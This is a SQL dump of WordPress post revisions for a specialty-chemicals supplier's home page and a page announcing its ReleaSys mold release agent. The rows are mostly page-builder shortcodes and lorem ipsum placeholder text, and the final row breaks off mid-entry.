INSERT INTO `wp_posts` VALUES (499, 3, '2016-08-18 18:41:25', '2016-08-18 18:41:25', '[ux_banner height="600px" text_color="dark" animated="fadeIn" text_width="40%" text_align="left" text_pos="left center" parallax="0" parallax_text="0"]\r\n<h2 class="uppercase">Semi-Permanent Mold Release</h2>\r\n<ul>\r\n 	<li class="thin-font">Superior Durability and Surface Adhesion</li>\r\n 	<li class="thin-font">Cost-Effective, Efficient Release</li>\r\n 	<li class="thin-font">High Slip; Minimal Transfer</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:41:25', '2016-08-18 18:41:25', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (500, 3, '2016-08-18 18:42:57', '2016-08-18 18:42:57', '[caption id="attachment_15" align="alignnone" width="800"]<img class="size-medium wp-image-15" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-800x533.jpg" alt="ReleaSys semi-permanent" width="800" height="533" /> ReleaSys semi-permanent[/caption]\r\n\r\n[ux_banner height="600px" text_color="dark" animated="fadeIn" text_width="40%" text_align="left" text_pos="left center" parallax="0" parallax_text="0"]\r\n<h2 class="uppercase">Semi-Permanent Mold Release</h2>\r\n<ul>\r\n 	<li class="thin-font">Superior Durability and Surface Adhesion</li>\r\n 	<li class="thin-font">Cost-Effective, Efficient Release</li>\r\n 	<li class="thin-font">High Slip; Minimal Transfer</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:42:57', '2016-08-18 18:42:57', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (501, 3, '2016-08-18 18:44:36', '2016-08-18 18:44:36', '[ux_banner height="600px" text_color="dark" animated="fadeIn" text_width="40%" text_align="left" text_pos="left center" parallax="0" parallax_text="0"]\r\n<h2 class="uppercase">[ux_banner bg="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Aerospace-1.jpg" height="500px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="1" parallax="1" effect=""]</h2>\r\n<h4 class="alt-font">Smaller On Top</h4>\r\n___\r\n<h1>BIG HEADLINE</h1>\r\n<h4 class="thin-font">A smaller text under headline</h4>\r\n[button text="button" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\nSemi-Permanent Mold Release\r\n<ul>\r\n 	<li class="thin-font">Superior Durability and Surface Adhesion</li>\r\n 	<li class="thin-font">Cost-Effective, Efficient Release</li>\r\n 	<li class="thin-font">High Slip; Minimal Transfer</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:44:36', '2016-08-18 18:44:36', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (502, 1, '2016-08-18 18:45:01', '2016-08-18 18:45:01', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col align="0"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:45:01', '2016-08-18 18:45:01', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (503, 3, '2016-08-18 18:45:54', '2016-08-18 18:45:54', '[ux_banner height="500px" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:45:54', '2016-08-18 18:45:54', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (504, 1, '2016-08-18 18:46:12', '2016-08-18 18:46:12', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/3" align="center"]\r\n\r\n[button text="TECH SUPPORT" link="https://" style="white alt-button" size="small"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:46:12', '2016-08-18 18:46:12', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (505, 1, '2016-08-18 18:46:40', '2016-08-18 18:46:40', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/3" align="center"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="small"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:46:40', '2016-08-18 18:46:40', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (506, 1, '2016-08-18 18:47:10', '2016-08-18 18:47:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="center"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="small"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:47:10', '2016-08-18 18:47:10', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (507, 1, '2016-08-18 18:47:38', '2016-08-18 18:47:38', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="product-category/release-agents/"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="5/6" align="center"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n<p style="text-align: center;">We are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.</p>\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6" align="center"]\r\n\r\n[button text="TECH SUPPORT" link="https://" size="large"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-18 18:47:38', '2016-08-18 18:47:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (508, 3, '2016-08-18 18:49:32', '2016-08-18 18:49:32', '[ux_banner height="500px" bg="15" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', 'Introducing ReleaSys - Our Newest Release Agent', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:49:32', '2016-08-18 18:49:32', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (509, 3, '2016-08-18 18:50:38', '2016-08-18 18:50:38', '[ux_banner height="500px" bg="15" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner]\r\n<h3></h3>\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re', '', '', 'inherit', 'closed', 'closed', '', '455-revision-v1', '', '', '2016-08-18 18:50:38', '2016-08-18 18:50:38', '', 455, 'https://132.148.10.86/wordpress/455-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (510, 3, '2016-08-18 18:53:09', '2016-08-18 18:53:09', '[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_banner height="500px" bg="75" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse now</a>\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n<h3>Lorem ipsum ipsum</h3>\r\nLorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat.re\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="500px" bg="15" text_color="dark" animated="fadeIn" text_width="35%" text_align="center" text_pos="right center" text_bg="#FFF" parallax="0" parallax_text="0"]\r\n<h3 class="alt-font">Coming soon..</h3>\r\n___\r\n<h2 class="animated fadeInLeft uppercase">SUMMER / SPRING 2015 BREECHES</h2>\r\n___\r\n\r\n<a class="button alt-button" title="" href="#">Browse 